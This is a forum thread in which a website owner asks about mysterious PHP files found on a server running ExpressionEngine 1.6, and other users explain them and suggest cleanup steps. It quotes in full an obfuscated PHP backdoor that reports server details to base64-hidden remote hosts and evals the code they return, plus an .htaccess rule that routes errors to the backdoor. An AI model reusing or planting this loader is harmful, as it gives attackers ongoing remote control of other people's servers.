Unexplained PHP files on server

I connected to my site and found these weird files.

Contents of one of the files:

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="059acf2696ad4f6dede9877e04b8285d") $f=$_REQUEST["id"];if($c=file_get_contents(base64_decode("aHR0cDovLzdhZHMu").$f.$z))eval($c);else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

The only difference in the files is the number, I think a hash, in this line:

($_REQUEST["q"])=="059acf2696ad4f6dede9877e04b8285d") 

Does anyone know what these files are and how they got on my site?

These are common types of files i have seen hackers use before, i would recommend you remove them asap and change your server password to a more secure 16 letter, number and symbol password to ensure they don’t return.

Beyond that, there’s probably a known security vulnerability in some software/package/service running on your server that a hacker exploited to get those PHP files there. Think about everything you’ve installed (blog systems, CMS’s, shopping carts, forums) and whether they’re running anything but the latest version… the main reason open source software gets minor version updates is to fix security vulnerabilities. That you haven’t updated means there are vulnerabilities which the whole world knows exists, that you’re vulnerable to, and anyone can exploit to do bad things.

Those files exist to let the hacker download new code to your server without having to hack it again.

Besides removing the files and changing my password, what can I do?

I just noticed they all have new .htaccess files too, that I didn’t put there…


Options -MultiViews
ErrorDocument 404 //ee-login/templates/frequently-asked-questions/133944.php

The 133944.php being the PHP file whoever added.

Thanks for your reply! I’m using ExpressionEngine (1.6) which is an old free core version versus the new version 2 which costs $$. I’ll check out Google to see if anyone else has had the same bad luck!

Thanks!

You toss the server, build a new one with up to date services and proper hardening, copy a clean copy of your websites over from your computer, and start over.

You really can’t trust a server that’s already been hacked. You don’t know what other backdoors they’ve already put in.

Wow, that’s awesome fun for me.

By “toss the server, build a new one with up to date services and proper hardening” you mean the physical server? Because I’m paying for hosting. Is this something they should be handeling?